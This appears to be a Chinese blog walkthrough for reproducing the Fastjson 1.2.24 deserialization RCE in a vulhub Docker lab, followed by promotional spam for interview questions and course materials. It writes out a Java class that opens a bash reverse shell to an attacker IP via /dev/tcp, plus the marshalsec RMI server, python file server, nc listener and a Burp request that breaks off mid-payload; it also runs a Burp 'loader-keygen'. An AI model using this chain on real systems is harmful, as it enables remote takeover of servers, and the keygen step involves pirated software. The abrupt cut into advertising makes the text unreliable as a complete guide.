网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
3)mv jdk-8u202-linux-x64.tar.gz /usr/local/java # 移动安装包至目录下
3.配置jdk环境变量
🌂进入目录下,解压此安装包,并配置环境变量
1)cd /usr/local/java
2)tar xzvf jdk-8u202-linux-x64.tar.gz
3)vim /etc/profile
编辑该文件,将下方四行代码输入,jdk存放路径和我不同的自行更改
JAVA_HOME=/usr/local/java/jdk1.8.0_202
PATH= P A T H : PATH: PATH:HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
4.替换原open jdk为oracle jdk
🌂更换原有的openjdk为oracle jdk1.8.0_202
1)update-alternatives --install /usr/bin/java java /usr/local/java/jdk1.8.0_202/bin/java 1
2)update-alternatives --install /usr/bin/javac javac /usr/local/java/jdk1.8.0_202/bin/javac 1
3)update-alternatives --set java /usr/local/java/jdk1.8.0_202/bin/java
4)update-alternatives --set javac /usr/local/java/jdk1.8.0_202/bin/javac# 存放路径不同的,记得更改~
5)java -version # 看是否成功替换为1.8版本
参考文章:kali安装maven和jdk、解决:bash: mvn: command not found_kali 安装mvn_召唤大白的博客-CSDN博客
二、安装并使用docker
1.安装docker
此处就不做过多讲解了,直接上大佬的安装步骤:https://www.cnblogs.com/lijingrong/p/13396884.html
🌂跟着上方教程安装完成,查看docker版本号
1)docker -v
2)docker-compose -v
2.拉取环境
🌂进入对应的漏洞环境目录
cd Desktop/vulhub/fastjson/1.2.24-rce
🌂启动容器,拉取环境
docker-compose up -d # 首次拉取会自动下载对应配置,出现done字样即为完成
2.1相关报错及处理
若此处出现下图类似报错,则执行下方代码块中命令,然后重新拉取环境即可~(没报错的直接跳过)
1)sudo mkdir -p /etc/docker
2)sudo tee /etc/docker/daemon.json <<-‘EOF’
{
“registry-mirrors”: [“https://yxzrazem.mirror.aliyuncs.com”]
}
EOF
3)sudo systemctl daemon-reload
4)sudo systemctl restart docker
3.验证环境
🌂环境运行完成,有两种验证方式:
1)http://your-ip:8090 # 出现json格式的输出,即为成功(下图一)
2)docker ps # 下图二
三、安装maven
1.下载安装包
🌂下载地址:
或
直接下载3.9.3版本安装包
https://dlcdn.apache.org/maven/maven-3/3.9.3/binaries/apache-maven-3.9.3-bin.tar.gz
2.新建maven目录存放安装包
🌂移动下载的安装包至 /usr/local/maven 目录下, 并解压
3.配置maven环境变量
🌂配置maven的环境变量,并更新
1)vim /etc/profile # 将下面三行代码复制到文件内
MAVEN_HOME=/usr/local/maven/apache-maven-3.9.3
PATH= M A V E N _ H O M E / b i n : MAVEN\_HOME/bin: MAVEN_HOME/bin:PATH
export MAVEN_HOME PATH2)source /etc/profile # 修改后使环境生效
3)update-alternatives --install /usr/bin/mvn mvn /usr/local/maven/apache-maven-3.9.3/bin/mvn 1
# 更新配置(路径和我不同的小伙伴记得更改"/usr…/maven…")
4)mvn -version # 查看mvn版本,是否安装成功
我这里下载的是3.9.3版本,不知道为什么安装之后显示版本为3.8.7(有知道的可以评论区留言~)
3.1相关报错及处理
此处报错的小伙伴,可以尝试 “rm -rf maven” 删除maven整个目录,然后重新安装(或验证是否执行上方第3步更新命令)
仍然报错的小伙伴可参考:kali安装maven和jdk、解决:bash: mvn: command not found_kali 安装mvn_召唤大白的博客-CSDN博客
四、安装RMI服务器
1.下载marshalsec并启动RMI器
🌂编译marshalsec项目,启动RMI服务器
1)下载marshalsec
github下载
https://github.com/mbechler/marshalsec
百度网盘直接下载
链接:https://pan.baidu.com/s/1BMtwwRPDMh6ZP1bumRHEwg?pwd=jx3a
提取码:jx3a
2)cd /usr/local/marshalsec/marshalsec-master # 进入目录下3)mvn clean package -DskipTests # 用maven编译marshalsec成jar包
五、漏洞复现
1.编写文件
🌂使用kali攻击机,编写touchfile.java文件,将如下代码写入,并编译为class文件
1)touch touchfile.java
2)vim touchfile.java # 不要直接执行第三步,看好代码输入完成再往下走
3)javac touchfile.java
import java.lang.Runtime;
import java.lang.Process;
public class touchfile{
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/攻击者ip/攻击者nc监听端口 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
}
}
}
2.开启python监听
🌂kali攻击机开启python服务,监听端口 # 注意python版本,执行对应命令
python3 -m http.server 8089 # python3使用的命令
python -m SimpleHTTPServer # python2使用的命令
3.加载远程类
🌂kali攻击机使用marshalsec项目,启动RMI服务器,监听端口9999,同时指定加载远程类touchfile.class
进入marshalsec-master目录下的target目录下执行,marshalsec是安装RMI的那个目录,target是编译后的目录
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://your-ip:1111/#touchfile” 9999
4.开启反弹shell的监听端口
🌂攻击机开启监听6666端口
nc -lvnp 6666
5. bp安装
🌂使用kali自带的bp或自己安装想要使用的bp版本,此处演示bp1.7.37安装
1)将文件夹复制至kali靶机中
2)java -jar burp-loader-keygen.jar # 第一次安装会弹出下图2窗口
3)跟着下方图片步骤一步步操作
6.火狐开启代理抓包
🌂进入kali自带的火狐游览器,更改设置,开启代理,端口为bp的8080
记着把bp的拦截开启,此时可以抓到包
🌂发送给repeater,修改参数,进行测试
POST / HTTP/1.1
Host:your-ip:8090
Accept-Encoding:gzip,deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
"b":{
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)
![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)
![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)
**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**